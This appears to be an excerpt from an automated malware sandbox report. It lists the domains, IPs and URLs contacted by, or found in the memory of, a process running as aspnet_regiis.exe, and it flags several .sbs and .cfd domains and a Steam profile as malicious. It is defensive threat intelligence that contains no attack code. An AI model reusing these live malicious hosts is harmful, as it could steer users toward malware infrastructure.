https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://avatars.akamai.steamstatic	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	0%	Virustotal		Browse
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
https://mathcucom.sbs/g	19%	Virustotal		Browse
enlargkiw.sbs	18%	Virustotal		Browse
drawwyobstacw.sbs	18%	Virustotal		Browse
https://sergei-esenin.com/	0%	Virustotal		Browse
https://vennurviot.sbs/	18%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA	0%	Virustotal		Browse
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	0%	Virustotal		Browse
mathcucom.sbs	21%	Virustotal		Browse
ehticsprocw.sbs	16%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	0%	Virustotal		Browse
allocatinow.sbs	20%	Virustotal		Browse
passimovrt.cfd	0%	Virustotal		Browse
https://mathcucom.sbs/apiq#V	0%	Virustotal		Browse
https://mathcucom.sbs/	21%	Virustotal		Browse
https://steamcommunity.com/my/wishlist/	0%	Virustotal		Browse
condifendteu.sbs	18%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse
https://drawwyobstacw.sbs/api	18%	Virustotal		Browse
https://allocatinow.sbs/api	20%	Virustotal		Browse
https://vennurviot.sbs/api	18%	Virustotal		Browse
https://steamcommunity.com/market/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
condifendteu.sbs	172.67.141.136	true	true	18%, Virustotal, Browse	unknown
steamcommunity.com	104.102.49.254	true	true	0%, Virustotal, Browse	unknown
vennurviot.sbs	104.21.46.170	true	true	18%, Virustotal, Browse	unknown
drawwyobstacw.sbs	188.114.96.3	true	true	18%, Virustotal, Browse	unknown
mathcucom.sbs	188.114.96.3	true	true	21%, Virustotal, Browse	unknown
sergei-esenin.com	104.21.53.8	true	true	18%, Virustotal, Browse	unknown
passimovrt.cfd	104.21.28.222	true	true	0%, Virustotal, Browse	unknown
ehticsprocw.sbs	104.21.30.221	true	true	16%, Virustotal, Browse	unknown
resinedyw.sbs	172.67.205.156	true	true	18%, Virustotal, Browse	unknown
enlargkiw.sbs	172.67.152.13	true	true	18%, Virustotal, Browse	unknown
allocatinow.sbs	unknown	unknown	true	20%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
enlargkiw.sbs	true	18%, Virustotal, Browse	unknown
allocatinow.sbs	true	20%, Virustotal, Browse	unknown
drawwyobstacw.sbs	true	18%, Virustotal, Browse	unknown
mathcucom.sbs	true	21%, Virustotal, Browse	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vennurviot.sbs/api	true	18%, Virustotal, Browse	unknown
ehticsprocw.sbs	true	16%, Virustotal, Browse	unknown
passimovrt.cfd	true	0%, Virustotal, Browse	unknown
condifendteu.sbs	true	18%, Virustotal, Browse	unknown
https://drawwyobstacw.sbs/api	true	18%, Virustotal, Browse	unknown
https://resinedyw.sbs/api	true		unknown
https://passimovrt.cfd/api	true		unknown
https://mathcucom.sbs/api	true		unknown
resinedyw.sbs	true		unknown
vennurviot.sbs	true		unknown
https://condifendteu.sbs/api	true		unknown
https://enlargkiw.sbs/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://mathcucom.sbs/g	aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse	unknown
https://steamcommunity.com/?subsection=broadcasts	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engliHh	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/	aspnet_regiis.exe, 00000002.00000002.1972630357.0000000002918000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://vennurviot.sbs/	aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse	unknown
https://store.steampowered.com/subscriber_agreement/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://resinedyw.sbs/apiq#V	aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/learning/access-man2	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/privacy_agreement/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mathcucom.sbs/apiq#V	aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/points/shop/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/5xx-error-landing	aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://mathcucom.sbs/	aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	false	21%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.a#h	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://help.steampowered.com/en/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/news/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamehY	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/subscriber_agreement/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/api	aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/css/	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://vennurviot.sbs/&	aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://passimovrt.cfd/	aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002947000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mathcucom.sbs/y#W	aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mathcucom.sbs/apiPy	aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/discussions/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs/	aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://allocatinow.sbs/pi	aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mathcucom.sbs/api2	aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.5.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/apir	aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs:443/api	aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://allocatinow.sbs/	aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.	aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.53.8	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	drawwyobstacw.sbs	European Union	13335	CLOUDFLARENETUS	true
172.67.152.13	enlargkiw.sbs	United States	13335	CLOUDFLARENETUS	true
